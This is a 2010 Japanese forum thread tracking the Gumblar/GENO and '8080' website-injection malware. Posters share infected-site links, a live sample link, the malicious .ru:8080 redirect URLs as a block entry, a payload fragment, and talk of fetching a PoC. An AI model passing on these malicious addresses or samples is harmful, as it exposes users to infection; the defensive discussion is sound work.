865 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 04:01:52 ]: 20XX年にはネットサーフィンをしていて脳を焼き切られたりする訳か。
866 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 04:07:55 ]: >>841
してるよ
867 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 06:00:54 ]: ノートソ警察w
tp://megalodon●jp/2010-0107-1225-07/ameblo●jp/caetla-2008/entry-10427328482●html
868 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 06:42:22 ]: >753
(4) JRE(Java Runtime Environment)を最新版に更新する

JRE入れてなかったら問題無い？
それともJRE入れて最新版にしとかないと駄目？
869 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 06:44:05 ]: いらないなら入れる必要はない
870 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 06:49:17 ]: 個人PCに悪さしないならおとなしくAvast!のupdateまったほうがいいんではないかな
871 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 06:58:22 ]: ttp://bakera.jp/ebi/topic/4016
似通った文章にみえた
指南してる人いるのかな
872 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:14:49 ]: >>870
avast使ってる人はそれでも良いんじゃないか
みんなが使ってると思ってるのかな
873 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:24:09 ]: avast!ﾀﾝ　ずっと一緒だお！
きゅいきゅい　きゅいーん！
874 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:29:24 ]: もう馬鹿しか使ってない
875 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:36:56 ]: >>872
なんでもいいけどアンチウイルスのupdateをまてばいいのさ
876 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:48:38 ]: 意味分からねえな
馬鹿havastのスレいけよ
877 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 07:49:56 ]: アンチウイルスの対応待つんじゃなくて
脆弱性の対処しとけば良いだけだ
avastなんかに期待するな
878 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 07:56:01 ]: >>849
検索窓のパーツに含まれてるJavaScriptファイルがやられてたので
設置してたサイトは改ざんサイト同然。

「ノートン警察」のブログパーツもJavaScriptファイルだから同じね。

>>744

＞期間：2009年12月25日1時～12月28日18時30分

改ざんファイルのタイムスタンプは 2009/12/24 1:30（GMT）周辺だったんだが、
どういう計算すると12月25日1時になるんだろ。

2009/12/26 2:47:54（GMT）に、検索窓のJavaScriptファイルだけ直したみたい。
ほかの奴のは29日夕方だけど、28日18時30分に閉鎖したってことかな
879 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 09:16:47 ]: www.note-pc.biz/
このページ改竄されてね？js検知すんぞ
880 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 09:28:19 ]: >>879
ttp://www●note-pc●biz/js/rollover●js
rollover.jsにぐぬーたんがいるおっおｗｗ
881 名前：sage ◆sage/xLnlI [2010/01/09(土) 09:37:40 ]: おっっっっっっっっっっっっっっっっっっっっっっっっはっっっっっっっっっっっっっっっっっっっっっっっっっっっようごっごっごごごごごございまｋっさ
882 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 09:44:13 ]: >>880
aguseのカスペが反応しないんだが新種かねぇ？
883 名前：sage ◆sage/xLnlI [2010/01/09(土) 09:45:20 ]: www16●atpages.jｐ/fileｄl/ds%20psp%20syosinsyakouza.html
884 名前：sage ◆sage/xLnlI [2010/01/09(土) 09:46:02 ]: >>883
検体です
（踏んだら危険）
885 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 09:50:52 ]: >>882
ほい
www.virustotal.com/analisis/cf4b42203397f1b333f0cf763a5aa081c3a8abc226af58e861f23880ac8c0a78-1262998068
886 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 09:53:04 ]: ClamAVに検体送っといたお
887 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 09:55:41 ]: >>885
ﾃﾝｷｭｰ
888 名前：sage ◆sage/xLnlI [2010/01/09(土) 10:02:17 ]: >>883に付け加え

コード
が
書いてある
だけ
です
889 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 10:15:30 ]: >>879を踏んでみた→Adobe ReaderとJavaが起動したが結局何も起こらず
両者とも最新版だお
890 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 10:17:31 ]: ニフティのオンラインスキャンやっても
3万ファイルぐらいでスキャン終了されて
system32のログとかローカルの中のtmpとかロック扱いで中身見てもらえないんだが
これ本当に大丈夫なんだろうか

マカフィーは今日手動更新してもファイル更新できないし
FTP使った後、一時間以上サイト改ざんされなければもう白でいいのか？
891 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 10:33:21 ]: >>889
＞踏んでみた→Adobe ReaderとJavaが起動
これアウトじゃね？
pdf開いてないのにReaderは普通起動しないだろ…
892 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 10:38:02 ]: >>891
ttp://www.keiyu.com/doc/pdflink.htm
embedでPDFを埋め込めるお
893 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 10:41:09 ]: /*------------------------------------------------------------
* ロールオーバーを設定する画像にクラス名「over」を指定
* ロールオーバー時に表示するための画像ファイル名後ろに「_over」をつける
/*------------------------------------------------------------*/
894 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 10:44:13 ]: しかも今回の攻撃は最新版のAdobe Readerがまだ修正してない脆弱性を使うようなんだが…
仮想環境でもないWindowsであんまりチャレンジしない方がいいぞ
895 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 10:58:13 ]: その落ちてくるPDFってのをくれ
scriptが埋め込むURLにアクセスしても0byteが帰ってくるだけで
何も落ちてこない。
windows使ってないから？リファラ見てる？
896 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 11:01:14 ]: 今回悪用されていると思われる脆弱性のPoC拾ってきたお
悪質なコードを取り除きPDFを作成次第配布するお
897 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:04:08 ]: >>889
ReaderはバージョンだけじゃなくJavaScript機能オフまでが対策

>>890
1時間程度じゃ改ざんされない可能性もある
心配ならOS入れなおせよ
898 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:05:20 ]: >>895
リファラも見てるかもしれんが
少なくともUserAgentは見てるんじゃね
899 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 11:09:21 ]: >>895
>>896のようにPoCをちょっといじったものなら別スレで喜んで張ってた奴がいる
avast!のWebシールドでも反応しない新ガンブラーが登場
tsushima.2ch.net/test/read.cgi/news/1262886266/

wgetで普通に取れる　ただこれは今回実際に攻撃に使われてるものではない
900 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:10:07 ]: >>889
> Adobe ReaderとJavaが起動したが結局何も起こらず
何も起きてないことをどうやって確認したんだ？
901 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 11:12:10 ]: >>900
ファイル操作系のAPIを全てフックして監視していたお
念のためにディスクイメージも比較した
結論：特に変化無し
902 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:13:03 ]: >>889は、まだトロイ本体が侵入して無いだけの状態かな？
903 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:14:28 ]: >>901
APIフックって自作？
何かツールあるの？
904 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:15:54 ]: 企業が結構やられてるから個人のサイトなんかもう恐くて見れないな
２ちゃんがやられる可能性もあるの？
905 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 11:16:01 ]: >>903
自作だお
既製品はシラネ
906 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:18:24 ]: 時間経過で変化出るのかな
907 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:19:05 ]: >>905
俺に作り方教えてくれ
908 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 11:24:54 ]: >>907
言語は？
909 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:26:26 ]: >>901
砂箱つかえよ
Sandboxieとか
910 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:29:28 ]: >>908
一応Cできる。カーネルの知識はない。
911 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:30:23 ]: >>910
要するにファイル操作系のAPIを全てフックして監視すればいいんじゃね？
912 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:49:27 ]: >>901
古いreaderとか入れろよ
913 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 11:59:33 ]: >>879
パソコンお直し隊電話番号
www.google.co.jp/search?hl=ja&source=hp&q=%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%81%8A%E7%9B%B4%E3%81%97%E9%9A%8A+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&lr=&rlz=1R2ADBR_ja&aq=5mr&oq=%E3%81%8A%E3%81%AA%E3%81%8A%E3%81%97%E3%81%9F%E3%81%84
2010-1-9（土）11:46電凸
中国人？が出る
よく分からんが、むかついたので完了とする
これ以降は、恣意的にウイルスを拡散しているものと判断
914 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 12:11:37 ]: >>811
凸電した
お宅のHPをみたらPCぶっ壊れたと言ってやった
915 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 12:40:52 ]: >>879
HEUR:Exploit.Script.Generic

ｶｽﾍﾟﾙｽｷｰ
ジェネリックで検知
916 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 13:08:28 ]: www.note-pc.biz/
ここはもう何も落としてこないな
単にアンチウィルスが反応するだけで、pdfも送り返して来ない
917 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 13:31:33 ]: ru:8080側でアクセス制御していて2度目以降は404を装うと何度言ったら…。
IP変えて(串可)どうぞ。
918 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 13:33:34 ]: アンチウイルスが反応するリンクをそのまま張るな
919 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 13:39:48 ]: >>912
それは軽く死ねる
920 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 13:58:01 ]: またAviraは誤検出か
いい加減にしとけや
921 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 14:56:04 ]: ファイル操作系だけじゃなくてプロセス生成とかネットワークを監視しなくていいのか？
というか監視は普通にProcess Monitorとかでできるんじゃないか
922 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 15:02:50 ]: 高木浩光さんコメントお願いします
923 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 15:04:43 ]: 高木はNyzillaで忙しい
924 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 15:45:45 ]: >>921
それだと表示されない関数があるお
Wiresharkと適当な実装のAPIフックプログラムを併用しているお

何故かVistaでフック出来ない件
教えてエロい人
925 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 15:47:44 ]: ム板行け
926 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 15:52:22 ]: 語尾の「～お」がキモい
死ね
927 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 15:57:02 ]: はいはいVipper乙
928 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 16:01:22 ]: おちつけお（　＾ω＾）
929 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 16:06:39 ]: (ﾟωﾟ)VIPお断りします
930 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 16:10:57 ]: （´・ω・）ｶﾜｲｿｽ
931 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 16:13:57 ]: >>924
プラグインの起動まではしているがその後こけてるということか
具体的にどういうコードが動いてるかは見てる？
932 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 16:22:30 ]: セキュ板はNoノートンだおだお
933 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 18:57:52 ]: このメールは全ご登録ユーザー様、
および製品情報サービスを申し込まれた方にお送りしております。

「Gumblar（ガンブラー）」関連ウイルスにご注意ください

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　ソースネクスト株式会社

いつもソースネクスト製品をご愛用いただき、誠にありがとうございます。
さて、現在、改ざんされたサイトを閲覧しただけで感染する「Gumblar（ガンブラー）」と
その亜種が流行しています。念のため、利用されているウイルス対策ソフトの対応状況を
確認されることをおすすめいたします。

なお、ソースネクストの「ウイルスセキュリティ」は、これらのウイルスに対応済みですので、
必要な方はこの機会にご検討ください。

　　セキュリティ製品のお客様専用サイト
　　mail.sourcenext.info/c/arzdfpimb1tdwKab

　　「ウイルスセキュリティ」のお買い求めはこちら
　　eSHOP価格4,480円（標準価格 4,980円） 10％OFF
　　mail.sourcenext.info/c/arzdfpimb1tdwKac

今後ともソースネクスト製品を末永くお使いいただきますようお願い申し上げます
934 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 19:06:49 ]: だが！　断る！！
935 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 19:07:25 ]: >>932
バスターでサクサク快適アルヨー
936 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 19:33:26 ]: ClamAVニダ
937 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:01:59 ]: >>616
FTP通信そのものを見てるとしたら繋いだFTP鯖だけだよね
繋いでないのに改竄されてる・一つ繋いだら他のFTP鯖のサイトも改竄されたと言ってる人はどうなるの？

繋いだのに忘れてるのかな？
938 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:03:17 ]: >>937
FTPクライアントにパスが保存してあるって
それを読み取られてるんじゃね？
939 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:03:58 ]: 嗚呼w日本語がｗ
940 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:21:57 ]: JAVAとJavascriptオフにしてたら感染しない？
941 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:23:26 ]: >>937
genoを解析したところによると一部のFTPクライアントの設定を読み取って改ざんするとなってた。
942 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:31:27 ]: スレの内容も堂々巡りだなｗ
943 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:55:44 ]: >>941
Genoとは別物だけどね
FTPクライアントの設定ファイルは見てるのは事実
944 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 20:59:43 ]: 【Geno】　ガンブラーウィルス　ヤフーも被害に　　昨年１０月２７日～今年１月８日
tsushima.2ch.net/test/read.cgi/news/1263036497/
945 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 21:04:37 ]: こう頻繁に見つかると企業の極秘情報も中国に売られてるんじゃない？
946 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 22:01:39 ]: avast! が LGPL のスクリプトに対応した
JS:Illredir-C [Trj]
947 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 22:32:53 ]: LGPLタイプのvirus total 再解析
結果: 10/41 (24.4%)
www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1263043815
948 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 22:46:59 ]: こっちのLGPLはもっと少ないな
新たにavastが加わったくらいだ
結果: 6/41 (14.64%)
www.virustotal.com/jp/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674
949 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 22:52:18 ]: カーチャンのPCが物凄いアクセスしてくる
950 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 22:54:15 ]: カーチャンが必死なんだろ
951 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 23:41:12 ]: カーチャンがんがれ！
952 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 23:42:47 ]: >>948
100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
953 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 23:48:08 ]: 馬鹿には（´・ω・）ｽnｽn出来ない（´・ω・）ｽｸﾘﾌﾟﾄ
ttp://2sen.dip.jp/cgi-bin/upgun/up1/source/up36231.htm
954 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 23:55:24 ]: 権限なしのなら大丈夫？
955 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 23:57:23 ]: >>953
これはなんだ？
NoScript入れてたからどうもないと思うが
956 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:00:12 ]: Security Tool はGumblarみたいにFTP情報流したりしないの？
957 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:08:33 ]: >>953
NoScript解いたけどどうもならないな・・・
958 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:27:12 ]: 俺
www29.atwiki.jp/geno/
の管理人だけど、更新したほうがいい？

正直今頃になって大騒ぎするとは思わなかったわ
959 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:31:18 ]: >>958
更新してくれるとありがたい
960 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:31:43 ]: >>958
当たり前だろ。出来ないんだったら
古い情報垂れ流して混乱招くからサイトごと消せ
961 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:33:33 ]: >>958
8080系がそのGENOウイルスと一緒だと思ってて
そこに書いてある対策とか薦めてる人が結構いるから
せめて注意書きくらいはしといた方がいいんじゃない？
962 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:39:06 ]: >>958
感染の確認方法と復帰方法は違う種類なので役に立たないと
いうのは書いておいた方がいいかも
963 名前：名無しさん＠お腹いっぱい。 [2010/01/10(日) 00:42:23 ]: ブロック推奨うｒｌ
baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/

糞長すぎ乙
964 名前：958 mailto:sage [2010/01/10(日) 00:52:25 ]: とりあえずほぼ全ページに警告入れてみた。

www29.atwiki.jp/geno/pages/19.html
これは今も有効な対策？
965 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:54:02 ]: >963
8080以下は何種類からかランダムで決まるから意味なし乙
それなら.ru:8080/をブロックする方がマシ
966 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:55:06 ]: >>964
うん
967 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 00:57:15 ]: >>964
とっても乙
968 名前：名無しさん＠お腹いっぱい。 [2010/01/10(日) 01:11:09 ]: 感染したサイト
↓リダイレクト
baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/google●co●th/google●co●th/google●com/17173●com/58●com/
↓リダイレクト
baidu-com●fandango●com●linkedin-com●webdirectbroker●ru:8080/index●php?ys
↓/pics/jquery.jx→eval("Aapdk2='M';");
現在人力デコードなう　←今ココ
969 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:24:10 ]: >>963
これは何なの？
970 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:26:12 ]: >>969
ガンプラの親玉
971 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:27:47 ]: >>964
超乙
それはいまも必要な情報でございます
972 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:31:32 ]: そろそろまずいので次スレ立ててくる
973 名前：972 mailto:sage [2010/01/10(日) 01:35:01 ]: ＥＲＲＯＲ！
ＥＲＲＯＲ：新このホストでは、しばらくスレッドが立てられません。
またの機会にどうぞ。。。

orz
ダメだったのでテンプレ貼り

【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊
＊＊＊感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
pc11.2ch.net/test/read.cgi/sec/1261855221/
【関連スレ】
GENOウイルススレ　★23
pc11.2ch.net/test/read.cgi/sec/1259607683/
974 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:37:07 ]: >>973
逝ってみる。
2以降はよろ。
975 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:38:37 ]: >>973
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
pc11.2ch.net/test/read.cgi/sec/1263055073/
976 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:41:23 ]: >>975
乙
977 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:42:11 ]: >>975
おつなんだから
978 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:42:52 ]: >>974
乙
貼っておきました
979 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:43:55 ]: >>978
乙でした。
980 名前：名無しさん＠お腹いっぱい。 [2010/01/10(日) 01:44:44 ]: 8080関連の検体詰め合わせってうｐっても大丈夫なのか？
981 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:46:22 ]: ほい

【鑑定目的禁止】検出可否報告スレ13
pc11.2ch.net/test/read.cgi/sec/1258817697/
982 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:48:22 ]: >>980
検出可否報告スレにならロダもあるし提出もしてくれそうで一石二鳥
解凍パスワードを"infected"か "virus"にしてうｐ
983 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:53:14 ]: ほな　１０００とっとくわな

【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
pc11.2ch.net/test/read.cgi/sec/1263055073/
984 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 01:54:40 ]: レッドカード出ますたｗ
985 名前：名無しさん＠お腹いっぱい。 [2010/01/10(日) 02:00:29 ]: ここ「ガンブラー」に感染したのか？
www.mag-x.com/blog/index.html
986 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:05:28 ]: >>985
ttp://www●mag-x●com/blog/cat16/
/*LGPL*/
987 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:05:45 ]: Bingのキャッシュに/*GNU GPL*/
988 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:06:18 ]: ほかもやられてるお。。。
989 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:09:04 ]: 凄いな・・・
990 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:12:58 ]: >>985
実施中の緊急メンテナンス終了予定のお知らせ

対応早いね
991 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:16:09 ]: >>990
他のページが放置っぽい。。。
992 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:17:10 ]: 対応早いとこはだいたいわかってないからな
再発する
993 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:20:34 ]: www●mag-x●com/にアクセスするとメンテナンスページに飛ばされるけど
リダイレクトが２回あって１回目でG dataが反応する
994 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:22:54 ]: >993

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
2:21:57
Kaspersky Internet Security 2010
995 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:36:34 ]: >>985
これ一ブログじゃなくて収容してるブログ全体にウイルスコード入れられたのか
996 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:37:14 ]: ikhvyhbl;lknouvb;jnl/ nu:;lj/.kl\;N*M*

なんだこれ新型か？
997 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:37:38 ]: >>993
ほんとだ

www●mag-x●com/　←302だけどボディに/*LGPL*/
↓
www●mag-x●com/pc●html
↓
www●mag-x●com/blog/index●html
998 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:40:30 ]: >>997
www.google.co.jp/search?q=site%3Awww.mag-x.com
これはひどいなあ
999 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:42:04 ]: >>998
うはw収容サイトにもれなく入ってる
1000 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/10(日) 02:42:26 ]: 1000なら癌ブラーは無くなる
1001 名前：１００１ [Over 1000 Thread]: このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef